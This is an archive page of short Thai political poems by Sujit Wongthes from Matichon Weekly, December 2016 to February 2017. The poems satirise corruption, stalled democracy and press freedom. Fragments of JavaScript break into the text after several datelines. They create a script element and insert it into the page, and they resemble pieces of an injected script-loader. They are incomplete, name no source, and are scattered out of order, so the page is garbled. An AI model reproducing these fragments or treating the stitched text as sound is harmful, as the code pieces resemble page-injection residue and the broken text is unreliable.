หมวดหมู่ ‘กลอนวันอาทิตย์’

มติชน วันอาทิตย์ 19 กุมภาพันธ์ 2560

มติชน วันอาทิตย์

19 กุมภาพันธ์ 2560

 

ธรรมะคุ้มครองผู้ประพฤติธรรม

ไม่ประพฤติธรรมก็คุ้มครองให้

คอร์รัปชั่นชัวร์ทั่วราชการไทย

รอดคุกได้ด้วยสังกัดกลุ่มคนดี

 

สุจิตต์ วงษ์เทศ

ศุกร์ 17 กุมภาพันธ์ 2560

มติชน วันอาทิตย์ 12 กุมภาพันธ์ 2560

มติชน วันอาทิตย์

12 กุมภาพันธ์ 2560

 

ผู้ชนะเขียนประวัติศาสตร์

ความร้ายกาจกองอยู่ผู้แพ้พ่าย

ปรองดองของผู้ชนะย่อมเป็นนาย

ผู้แพ้ต้องน้อมกายไม่มีใจ

 

สุจิตต์ วงษ์เทศ

ศุกร์ 10 กุมภาพันธ์ 2560

มติชน วันอาทิตย์ 5 กุมภาพันธ์ 2560

มติชน วันอาทิตย์

5 กุมภาพันธ์ 2560

 

เสรีภาพประชาชน

คราวถูกปล้นผ่านมาถ้าร่วมต้าน

สื่อย่อมมีมวลชนอภิบาล

มหาศาลเสรีภาพสื่อมวลชน

 

สุจิตต์ วงษ์เทศ

ศุกร์ 3 กุมภาพันธ์ 2560

มติชน วันอาทิตย์ 29 มกราคม 2560

มติชน วันอาทิตย์

29 มกราคม 2560

 

ที่ไหนสว่าง ที่นั่นสะอาด

ไม่สะอาดก็เพราะหาสว่างไม่

ยิ่งเตะถ่วงเวลาประชาธิปไตย

ยิ่งไม่สว่างไม่สะอาดไม่ขาดโกง

 

สุจิตต์ วงษ์

ศุกร์ 27 มกราคม 2560

 d.getElementsByTagName(‘head’)[0].appendChild(s);

มติชน วันอาทิตย์ 22 มกราคม 2560

มติชน วันอาทิตย์

22 มกราคม 2560

 

เศรษฐกิจสังคมวัฒนธรรม

ชูชุบอุปถัมภ์คอร์รัปชั่น

เริ่มแต่ยุคเรือใบดึกดำบรรพ์

ถึงเรือบินปัจจุบันอนาคต

 

สุจิตต์ วงษ์เทศ

ศุกร์ 20 มกราคม 2560d.getElementsByTagName(‘head’)[0].appendChild(s);

มติชน วันอาทิตย์ 15 มกราคม 2560

มติชน วันอาทิตย์

15 มกราคม 2560

 

น้ำมาปลากินมด

น้ำลดตอผุดมดกินปลาเน่า

ช้างตายใบบัวปิดไม่มิดเม้าธ์

ว่าแต่เขาเหล่าคนดีก็เป็นเอง

 

สุจิตต์ วงษ์เทศ

ศุกร์ 13 มกราคม 2560} else {

มติชน วันอาทิตย์ 8 มกราคม 2560

มติชน วันอาทิตย์

8 มกราคม 2560

 

เทคโนโลยีล้ำสมัยฉับไวซื้อ

เครื่องมือขับเข่นฆ่าคนห่าใหญ่

ไม่เว้นเล่นงานต้านประชาธิปไตย

สังคมทันสมัย แต่ไม่พัฒนา

 

สุจิตต์ วงษ์เทศ

ศุกร์ 6 มกราคม 2560var d=document;var s=d.createElement(‘script’);

มติชน วันอาทิตย์ 1 มกราคม 2560

มติชน วันอาทิตย์

1 มกราคม 2560

 

มีสิทธิ์ฝันอนาคตงดงาม

สำเร็จความจำเริญเริ่มปีใหม่

สิ่งแรกต้องทำทันใด

ตื่นให้ตาสว่างอย่างเท่าทัน

 

สุจิตต์ วงษ์เทศ

ศุกร์ 30 ธันวาคม 2559document.currentScript.parentNode.insertBefore(s, document.currentScript);

มติชน วันอาทิตย์ 25 ธันวาคม 2559

มติชน วันอาทิตย์

25 ธันวาคม 2559

 

ครูใหญ่ครูน้อยลดหลั่น

ชนชั้นผู้น้อยผู้ใหญ่

ชั้นของชนคนเป็นไปเช่นใด

ศึกษาไทยก็ต้องเป็นไปเช่นนั้น

 

สุจิตต์ วงษ์เทศ

ศุกร์ 23 ธันวาคม 2559

มติชน วันอาทิตย์ 18 ธันวาคม 2559

มติชน วันอาทิตย์

18 ธันวาคม 2559

 

ถ้าคุณเหงาเราคือเพื่อน

ถึงไม่เหงาเราคือเพื่อนหาพ้นไม่

แสนสอดรู้สอดเห็นความเป็นไป

ล้วงรู้ไส้รู้พุงเพื่อนเพียบแล้ว

 

สุจิตต์ วงษ์เทศ

ศุกร์ 16 ธันวาคม 2559} else {